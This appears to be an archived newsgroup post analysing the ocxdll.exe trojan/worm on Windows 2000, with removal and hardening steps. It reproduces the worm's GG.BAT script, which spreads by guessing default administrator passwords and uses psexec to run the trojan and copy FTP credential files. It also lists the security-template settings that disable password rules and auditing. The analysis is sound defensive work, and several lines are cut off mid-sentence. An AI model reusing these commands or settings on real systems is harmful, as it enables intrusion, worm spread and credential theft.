Hi Edward Alfert,
I referenced the steps you wrote in my document. They are nice steps
and most importantly, it was tested and worked for many people. Great
Here is my analysis:
Sorry guys if this is a repeat. I kind of need to make a correction
on the steps to restore security templates, and I just referenced
Edward Alfert's instructions:
More Analysis on ocxdll.exe virus: v. 1.1
Kyle Lai, CISSP, CISA
This is a SMB over TCP attack, using port 445. It looked for
vulnerability in weak administrator id and passwords on the local
Windows 2000 systems.
One of my clients also got infected with ocxdll.exe virus. This
occurred back in 8/28/2002 at 3am. After some detailed analysis, I
have determined that it was a Trojan, deleted the detected registry
entries, deleted the infected files, tightened the local administrator
ID and password, restored the security policy by running "secedit.exe
/configure" (from Microsoft) to restore the security policy (If they
have a backup .sdb file, then just reapply the security policy would
fix this part), added users /groups back to "Access this computer from
the network" policy . The cause was due to bad security (admin ID and
passwords), and firewall, and possibly a backdoor.
- Windows 2000, XP (same port, 445, but not tested yet). Security
policiesalteration was ONLY for Windows 2000 (and maybe on XP)
- Windows NT – might be infected as the "root problem" to spread the
trojan, but it will not get this Trojan base on its re-distribution
method. You probably want to look into this system to determine if
there are any backdoors, Trojans, or if this system wascompromised in
any way. It will not change security policies.
What did it do?
1. hide all programs it ran.
2. Run mIRC client with random usernames listed in mdm.scr with more
3. open backdoor, port 60609
4. It ran the bot (robot) scripts in the following order, which means
malicious automated instructions.
5. Replace security policy settings using Microsoft security editor
(SecEdit.exe/configure) command and reset the security policy to
default settings, and replace some additional security settings using
the TFT8675 file. This is done in quiet mode so itprobably only
flashed the command line window very quickly.
6. It scans for 25 IP's and then start running "GG.BAT". GG.BAT is
the REAL program that started the hacking.
7. It tries to hack into the system using the following user ID and
you don't have these user id and passwords, maybe you are just
infected with 1 system,
and it could not spread via this Trojan/worm.
a. "administrator" with NO password
b. "administrator" with "administrator" password
c. "root" with "root" password
d. "admin" with "admin" password
8. If you have some guessable administrator id and passwords, then
probably these systems were hacked successfully. It copied the Trojan
OCXDLL.EXE to the compromised systems. If file were there, copy it
anyway, and do it quietly. (using psexec.exe –c –f -d)
9. Run the OCXDLL.EXE without any delay (psexec.exe –d), which
extracted the 17 files that are in this self-extracted file.
10. It tries to copy "c:\progra~1\flashfxp\sites.dat" and
"c:\progra~1\ws_ftp\ws_ftp.ini" to "c:\windows\system32" directory.
(maybe get the configuration from the bot?)
11. Start the "taskmngr.exe" which was really a Mirc.EXE, an irc
12. The scripts were kicked in to HIDE the mirc window, so you can
ONLY see it in the process. You will see "taskmngr.exe" (NOT
taskmgr.exe, which is the REAL task manager)
13. xvpll.hlp reports Trojan status back to the hacker. Either
attempt failed or attempt successful.
Disclaimer: The irc bot scripts have not fully analyzed. This is
what I understood so far. The removal instructions WILL remove the
This may be a random attack. However, there is a file, ncp.exe
involved, which is the NetCat program. This program allows the
hackers to gain full control to your system.
1. Best-case scenario is that it was a hack, and no sensitive data
2. Worst-case scenario is that they have controlled your system and
implemented something new that are not yet detected.
3. The hacker has captured your IP address and knows that you were
vulnerable because the Trojan actually reported back to him/her.
How to remove the Trojan:
1. Delete files that were extracted from ocxdll.exe, plus ocxdll.exe
(created when running mirc.exe)
gg.bat (bat file to hack and copy Trojans)
httpsearch.ini (might show up as httpsear.ini due to 8.3 file format)
kill.exe (to kill process)
mdm.exe (to hide window program)
seced.bat is a decoy. This file was never used. The real instruction
for updating the
configuration was mentioned in item #5.
v.exe is actually srvany.exe, which is another decoy. It was never
2. Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run,
remove "taskmngr.exe" (this starts mirc client program during the
3. Change the LOCAL Administrator password on ALL Systems! This
includes Windows 2000 PROESSIONAL! Make sure the new passwords are
strong passwords! Use mix of Uppercase, Lowercase, numbers, and
non-alphanumeric, i.e. _,+,=,), … for your newpasswords, and make sure
the passwords are NOT similar to the administrator ID in any way. For
example, "Administrator123" is a very bad password, even it has mix
cases and alphanumeric.
4. If possible, change Administrator login ID to a different user_id.
This will stop the initial user_id guessing. (This will not stop the
more sophisticated hackers)
5. Restore the default security policy by restoring the basic
Microsoft default security template. The following instruction for
restoring basic default security template is from the USENET posting
by Edward Alfert (edw...@alfert.com) under topic "Solution to mIRC
and Secedit Virus Networking Problems." in
microsoft.public.scripting.virus.discussion.. More info on Microsoft
Security configuration and analysis can be found at
Here are the instructions from Edward Alfert.
1) use the backup security database template to restore the system to
original microsoft defaults. (NOTE...if you upgrade from a previous
this default may not be the default you are used to)...
Secedit /configure /cfg basicwk.inf /db basicwk.sdb /log basicwk.log
2) copy /winnt/security/database/secedit.sdb to
you need to do this because you can't run step #3 against the original
3) click on start, run, type mmc and click ok
4) click Console menu, then Add/Remove Snap-In
5) click Add, then double click on "Security and Configuration
"Security Templates", then click close, and ok.
6) right click on "security and configuration analysis" and click on
database"... browse to /winnt/security/database/secedit-check.sdb and
7) right click on "security and configuration analysis" and seclect
"analyzie computer now"
8) browse throught the directory structure and you will see that the
computer is currently configured differently..
Make changes as appropriate for your environment.
For example, a very important option that is probably missing (as
the trojan) is that nobody is allowed to logon to the computer via the
6. Goto start -> programs -> administrative tools -> Local Security
Policy, click on
"User Rights Assignments", and add users and groups back into the
policy. "Access this
computer from the network". The default setting is:
c. BACKUP OPERATORS
d. POWER USERS
g. IUSR_[ SYSTEM_NAME]
7. You MUST go through the security policies and make sure proper
access were restored. You or some of your applications might have
specific rights settings prior to the compromise, and the user/group
privilage/rights need to be reset if necessary.
8. You probably have seen a strange SID that was added by the trojan
in the "Logon Locally" policy. Remove the user SID. The SID there does
NOT mean the trojan created a user. It was in the security template on
TFTP8675 file. You can see it on the bottom of this document.
1. Tighten your Firewall and lock down the ports and ACL, BOTH inside
to outside, and outside to inside. Make sure port TCP/UDP 445 is
blocked both inbound and outbound on the firewall.
2. If possible, Rename your administrator user id to something else,
and create a user id called "Administrator" with NO GROUPS associated
with it. This will allow you to monitor anyone from trying to use the
3. Setup the security event log. Log successful and failed
Logon/Logoff to audit system access. Make sure to monitor the event
- Hkey local machine\Software\Microsoft\Windows\CurrentVersion\Run,
(this starts mirc client program during the windows startup)
When MIRC client started running, it ran the scripts in dll32nt.hlp,
which in fact ran "secedit /configure /DB secedit.sdb /cfg $mircdir $+
tftp8675 /quiet". This meant
"configure your system setting with the existing security policy in
secedit.sdb, plus the additional settings in tftp8675". It basically
removed many security restrictions, remove all audits for the systems,
and of course remove all users in the "Local Users allowed from the
OCXDLL.EXE is a self-extracted file that included 17 files. It is a
Trojan/worm. In the dll32nt.hlp, it has an instruction to do IP scan,
and store the 25 IP address it found. Mostly likely it scanned the
subnet and file servers that were connected to the compromised system
at that time. Then the Trojan has an instruction at the end to run
GG.BAT, which is the instruction to attack the 25 IP's it just found.
Then the process started all over again.
Here are the files that were extracted from ocxdll.exe:
Here is the GG.BAT text:
net use /del \\%1\ipc$
net use \\%1\ipc$ "" /user:administrator
net use \\%1\ipc$ "administrator" /user:administrator
net use \\%1\ipc$ "root" /user:root
net use \\%1\ipc$ "admin" /user:admin
psexec \\%1 attrib.exe -r ocxdll.exe
psexec \\%1 -d kill.exe temp.exe
psexec \\%1 -f -c -d ocxdll.exe -o
psexec \\%1 -d ocxdll.exe -o
psexec \\%1 cmd.exe /c copy c:\progra~1\flashfxp\sites.dat
psexec \\%1 -d taskmngr.exe
psexec \\%1 cmd.exe /c copy c:\progra~1\ws_ftp\ws_ftp.ini
psexec \\%1 -d taskmngr.exe
from SysInternals, here is the description of what the PSEXEC
-c = Copy the specified program to the remote system for execution. If
you omit this option then the application must be in the system's path
on the remote system.
-f = Copy the specified program to the remote system even if the file
already exists on the remote system.
-d = Don't wait for application to terminate. Only use this option for
List from TFTP8675:
MinimumPasswordAge = 0
MaximumPasswordAge = 42
MinimumPasswordLength = 0
PasswordComplexity = 0
PasswordHistorySize = 0
LockoutBadCount = 0
RequireLogonToChangePassword = 0
ClearTextPassword = 0
AuditSystemEvents = 0
AuditLogonEvents = 0
AuditObjectAccess = 0
AuditPrivilegeUse = 0
AuditPolicyChange = 0
AuditAccountManage = 0
AuditProcessTracking = 0
AuditDSAccess = 0
AuditAccountLogon = 0
sebackupprivilege = *S-1-5-32-544,*S-1-5-32-551
secreatepagefileprivilege = *S-1-5-32-544
sedebugprivilege = *S-1-5-32-544
seincreasebasepriorityprivilege = *S-1-5-32-544
seincreasequotaprivilege = *S-1-5-32-544
seloaddriverprivilege = *S-1-5-32-544
senetworklogonright = Microsoft
seprofilesingleprocessprivilege = *S-1-5-32-544,*S-1-5-32-547
seremoteshutdownprivilege = *S-1-5-32-544
serestoreprivilege = *S-1-5-32-544,*S-1-5-32-551
sesecurityprivilege = *S-1-5-32-544
sesystemenvironmentprivilege = *S-1-5-32-544
sesystemprofileprivilege = *S-1-5-32-544
sesystemtimeprivilege = *S-1-5-32-544,*S-1-5-32-547
setakeownershipprivilege = *S-1-5-32-544